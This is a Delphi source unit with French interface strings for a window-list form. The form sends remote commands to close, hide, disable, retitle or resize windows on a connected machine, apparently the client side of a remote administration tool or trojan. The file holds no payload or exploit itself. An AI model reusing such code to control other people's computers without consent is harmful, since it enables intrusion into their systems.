(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untTaskList.pas                                 ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of TaskList form                    ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untTaskList;

interface

uses
  SysUtils, Classes, Controls, Forms, ComCtrls, StdCtrls, Buttons;

type
  TfrmTaskList = class(TForm)
    ChkShowAll: TCheckBox;
    SpdRefresh: TSpeedButton;
    SpdClose: TSpeedButton;
    SpdFocus: TSpeedButton;
    SpdChangeCaption: TSpeedButton;
    EdtNewTitle: TEdit;
    SpdHide: TSpeedButton;
    SpdShow: TSpeedButton;
    SpdDisableWin: TSpeedButton;
    SpdMaximize: TSpeedButton;
    SpdMinimize: TSpeedButton;
    SpdEnableWin: TSpeedButton;
    LvwProcess: TListView;
    SpdDisableX: TSpeedButton;
    procedure FormCreate(Sender: TObject);
    function IsSelected(var hWnd:string):Boolean;
    procedure SpdRefreshClick(Sender: TObject);
    procedure SpdCloseClick(Sender: TObject);
    procedure SpdEnableWinClick(Sender: TObject);
    procedure SpdShowClick(Sender: TObject);
    procedure SpdFocusClick(Sender: TObject);
    procedure SpdMaximizeClick(Sender: TObject);
    procedure SpdMinimizeClick(Sender: TObject);
    procedure SpdChangeCaptionClick(Sender: TObject);
    procedure LvwProcessSelectItem(Sender: TObject; Item: TListItem;
      Selected: Boolean);
    procedure PutOnList(Data:string);
    procedure LvwProcessClick(Sender: TObject);
    procedure SpdDisableXClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmTaskList: TfrmTaskList;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmTaskList.FormCreate(Sender: TObject);
var
   LvwWidth:Integer;
begin
   Caption:='Fenetres';
   LvwWidth:=LvwProcess.Width;
   LvwProcess.Columns.Items[0].Width:=Trunc(LvwWidth * 0.7);
   LvwProcess.Columns.Items[1].Width:=Trunc(LvwWidth * 0.2);
end;

function TfrmTaskList.IsSelected(var hWnd:string):Boolean;
var
   Item:TListItem;
begin
   Item:=LvwProcess.Selected;
   if Item <> nil then
      hWnd:=Item.SubItems[0]
   else
      if frmMain.ClientMain.Active then
         frmMain.PutStatus('Choisir un item...')
      else
         frmMain.PutStatus('PAS connect...');
   IsSelected:=Item <> nil;
end;

procedure TfrmTaskList.SpdRefreshClick(Sender: TObject);
begin
   LvwProcess.Items.Clear;
   frmMain.strStatus:='Rafraichissement...';
   frmMain.SendCommand(COMMAND_GET_TASK_LIST,IntToStr(Integer(ChkShowAll.Checked)));
end;

procedure TfrmTaskList.SpdCloseClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Fermeture...';
   frmMain.SendCommand(COMMAND_CLOSE_WINDOW,hWnd);
end;

procedure TfrmTaskList.SpdEnableWinClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Essait de ' +  LowerCase(TSpeedButton(Sender).Caption) + ' window...';
   frmMain.SendCommand(COMMAND_WINDOW_ENABLE,hWnd + IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmTaskList.SpdShowClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' window';
   frmMain.SendCommand(COMMAND_SHOW,hWnd + IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmTaskList.SpdFocusClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Focusing fenetre...';
   frmMain.SendCommand(COMMAND_WINDOW_FOCUS,hWnd);
end;

procedure TfrmTaskList.SpdMaximizeClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Maximizer en cour...';
   frmMain.SendCommand(COMMAND_WINDOW_MAX,hWnd);
end;

procedure TfrmTaskList.SpdMinimizeClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Minimizer en cour...';
   frmMain.SendCommand(COMMAND_WINDOW_MIN,hWnd);
end;

procedure TfrmTaskList.SpdChangeCaptionClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='Changement du titre...';
   frmMain.SendCommand(COMMAND_CHANGE_TITLE,hWnd + Chr(13) + EdtNewTitle.Text);
end;

procedure TfrmTaskList.LvwProcessSelectItem(Sender: TObject;
  Item: TListItem; Selected: Boolean);
begin
   LvwProcessClick(Self);
end;

procedure TfrmTaskList.PutOnList(Data:string);
var
   p:LongInt;
   f,c:string;
   NewItem:TListItem;
   Add:Boolean;
begin
   f:=Chr(13);
   p:=Pos(f,Data);
   Add:=True;
   while p > 0 do
   begin
      c:=Copy(Data,1,p - 1);
      Data:=Copy(Data,p + 1,Length(Data));
      if Add then
      begin
         NewItem:=LvwProcess.Items.Add;
         NewItem.Caption:=c;
         Add:=False;
      end
      else
      begin
         NewItem.SubItems.Insert(0,c);
         Add:=True;
      end;
      p:=Pos(f,Data);
   end;
   NewItem.SubItems.Insert(0,Data);
end;

procedure TfrmTaskList.LvwProcessClick(Sender: TObject);
var
   LItem:TListItem;
begin
   LItem:=LvwProcess.Selected;
   if LItem = nil then
      EdtNewTitle.Text:=''
   else
      EdtNewTitle.Text:=LItem.Caption;
end;

procedure TfrmTaskList.SpdDisableXClick(Sender: TObject);
var
   hWnd:string;
begin
   if not IsSelected(hWnd) then Exit;
   frmMain.strStatus:='TDsactivation du X...';
   frmMain.SendCommand(COMMAND_DISABLE_X,hWnd);
end;

end.
